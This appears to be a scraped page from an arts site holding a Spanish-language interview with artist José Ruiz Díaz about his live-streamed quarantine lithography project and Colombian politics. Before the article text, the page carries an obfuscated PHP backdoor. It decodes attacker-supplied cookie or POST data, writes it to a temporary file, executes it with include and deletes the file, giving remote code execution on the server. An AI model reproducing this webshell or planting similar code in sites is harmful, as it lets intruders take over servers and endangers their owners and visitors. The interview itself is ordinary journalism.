$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Portada- entrevista: Impresiones sobre actualidad. – www.interferencechannel.com

Portada- entrevista: Impresiones sobre actualidad.

La cuarentena cuestionó profundamente la manera en que nos relacionamos con la rutina y la coordinación de nuestras rutinas con las de las personas y objetos con los que co-habitamos. Muchos hemos tenido que acoplar nuestro lugar de habitación como lugar de trabajo pero José Ruiz Díaz, un joven artista bogotano, ha venido habitando el Espacio el Dorado, una preciosa galería de arte ubicada en la Macarena, Bogotá y transmitiendo 24/7 lo que pasó de ser un elemento interactivo de su exposición “Impresiones sobre actualidad” a una especie de performance de impresión litográfica en el que Ruiz acopla sugerencias del público para crear carteles como “Hoy paciencia”, “Hoy realidad”, “Hoy ficción”, “Hoy videovigilancia. Nuestro Editor General tuvo la oportunidad de conversar con él sobre la peculiar situación y de preguntarle sobre el desarrollo de la misma.

Imágenes: Cortesía Espacio el Dorado.

IC: Impresiones sobre actualidad parece a ratos ser una meditación budista sobre el “estar en el ahora”, además de las claras influencias de la historia y la historiografía, ¿qué te llevó a reflexionar y crear al rededor del concepto del hoy?

José Ruiz: Si bien el concepto de “hoy” estructura todo el proyecto, el interés en esa palabra surgió de forma accidental. Cuando inicié la investigación que sustenta el proyecto, mi intención era ahondar en el abstracto concepto de actualidad. Lo curioso es que la forma en la que nos acostumbramos para referirnos y representar la “actualidad” no se puede desligar del uso desmedido de la palabra hoy, o esa fue mi conclusión. Impresiones sobre actualidad es una reflexión sobre la representación del presente desde el lenguaje. La palabra “hoy” es solo un instrumento dentro del juego que quiero plantearle al espectador, un juego diario que es independiente a la exposición. No hay forma de contabilizar el número de veces al día que leemos la palabra hoy en distintos contextos y en distintos formatos. 

Lo interesante es que a esa palabra le otorgamos un valor temporal y a eso se debe su uso desmedido, lo que leemos hoy, es actual porque lo leemos hoy; pero si pensamos que la palabra hoy caduca al término de 24 horas, como lo sugiere su significado (hoy: lo que refiere a este día) la actualidad, en consecuencia, también lo hace. El hoy que leemos en la calle, en medios impresos, en la pantalla, etc corresponde al tiempo de enunciación/publicación de la palabra, un tiempo que caduca al cabo de unas horas. La obra que propongo ya existía mucho tiempo antes de iniciarla, todos éramos parte ella y lo continuaremos siendo. Sin lector, todos los enunciados dentro y fuera de la sala con la palabra hoy pertenecen a un tiempo caduco (el de impresión/publicación) solo cuando alguien lee los enunciados adquieren vigencia, adquieren actualidad, porque los leemos hoy. 

IC:La tecnología y las redes sociales han afectado por completo nuestras ideas de privacidad, distancia e incluso realidad, durante la cuarentena, y precisamente gracias a la tecnología, tu “hoy” ha sido casi por completo de dominio público ¿cómo ha afectado esa supervigilancia tu día a día y tu obra?

José Ruiz: Un aspecto muy interesante de nuestra relación actual con las pantallas, herencia del desarrollo del medio en el siglo pasado, es que esperamos que todo lo que vemos nos entretenga: de ahí el éxito de las aplicaciones que nos bombardean con un contenido que parece infinito. 

La hipervigilancia es un quiebre en esa idea de entretenimiento, una transmisión 24/7 pierde toda noción de espectáculo en la medida que está sincronizada con nuestro tiempo vital, muchas cosas me podrían suceder durante el encierro que hagan de la transmisión algo más interesante, pero no podríamos saber en qué momento ocurren. Sí, estamos hiperconectados, sí, nuestras nociones de privacidad, distancia, etc, han cambiado, pero estamos acostumbrados a que la virtualidad es entretención y no rutina. En este tiempo en cuarentena, creo que entendimos que la virtualidad es tan interesante como verte a ti mismo en una pantalla 24/7.

IC: La crisis sanitaria ha disparado la casi inexistente popularidad del presidente de la República y ha callado las voces de manifestación y descontento con su gestión ¿cómo responde el arte a la propaganda y cómo podemos manifestarnos desde el encierro?

José Ruiz: Creo que las figuras políticas caen por su propio peso. Duque logró la difícil tarea de reavivar el peor de los gobiernos en los últimos 50 años: los nexos con el narcotráfico de Samper, la inoperancia de Gaviria, la ceguera social y política de Betancur, la estupidez de Turbay, por mencionar solo algunos ejemplos. A pocos presidentes de la historia reciente colombiana recordamos en buenos términos, y con certeza, Duque no será la excepción, en parte porque en su momento, los actos de cada uno de ellos fueron registrados por el ojo crítico de artistas, escritores, periodistas, etc. 

La pregunta no solo debe ser ¿cómo respondemos a la inoperancia de Duque? sino también ¿cómo registramos dicha inoperancia?. Hoy, la respuesta lógica para responder a la inoperancia es mantener vivas las movilizaciones que se desarrollaron al final del año pasado y que prometían intensificarse éste, cambiándolas de formato por obvias razones. El registro, por otra parte, aunque parece sencillo, no lo es. ¿Cómo registrar la actualidad política? Bajo la lógica gubernamental colombiana declaraciones como: Hoy estado indiferente, Hoy falsos positivos, Hoy en guerra, Hoy silla vacía, siempre tienen vigencia. Aunque cada uno de estos enunciados refiera a periodos políticos diferentes, estos y muchas otros parecen compartir la misma actualidad. Las acciones, o más bien, inacciones de Duque se irán sumando al listado. 

IC: La cuarentena ha cambiado por completo nuestra vida, nos ha llevado a cancelar o suspender proyectos, añorar actividades que antes podíamos realizar, y en general, a repensar varios aspectos de la cotidianidad ¿Cómo te imaginas la nueva normalidad cuando ésto pase?

José Ruiz: El adjetivo “nuevo” lo utilizamos casi con la misma frecuencia que la palabra “hoy”. De alguna forma, este adjetivo alude a la idea de actualidad: lo que es nuevo es actual, pero si la actualidad es una ficción del tiempo, la novedad, en consecuencia, también lo es.

Pienso que no existe algo como una “nueva normalidad”, porque siendo estrictos y asumiendo una postura evolucionista, estamos en una normalidad “novedosa” a la de hace unos meses, que a su vez era “novedosa” a la de hace unos años, que a su vez era “novedosa” a la de hace unas décadas. La carga moral de la palabra normal tampoco ayuda a desarrollar una conversación sobre este tema. Replanteando los términos de la pregunta, cuando esto pase nos aferraremos a un “hoy” que estará acompañado de otras palabras que ya no serán pandemia, enfermedad, cuarentena, etc, y eso constituirá nuestra “nueva normalidad”.

IC: La participación de las personas a través de las redes sociales ha sido muy importante en el desarrollo de tus impresiones, ¿cuál sugerencia es la que más te ha cautivado, cuál ha sido la respuesta de la gente a tu trabajo?

José Ruiz: La interacción presencial era parte fundamental del proyecto cuando inició, el cambio a la interacción virtual le otorgó otra dimensión que ha tenido muy buena acogida entre las personas que participan activamente y los espectadores en general. Entre tantas sugerencia es difícil escoger alguna, creo que con todas tengo empatía por diferentes razones

Comments are closed.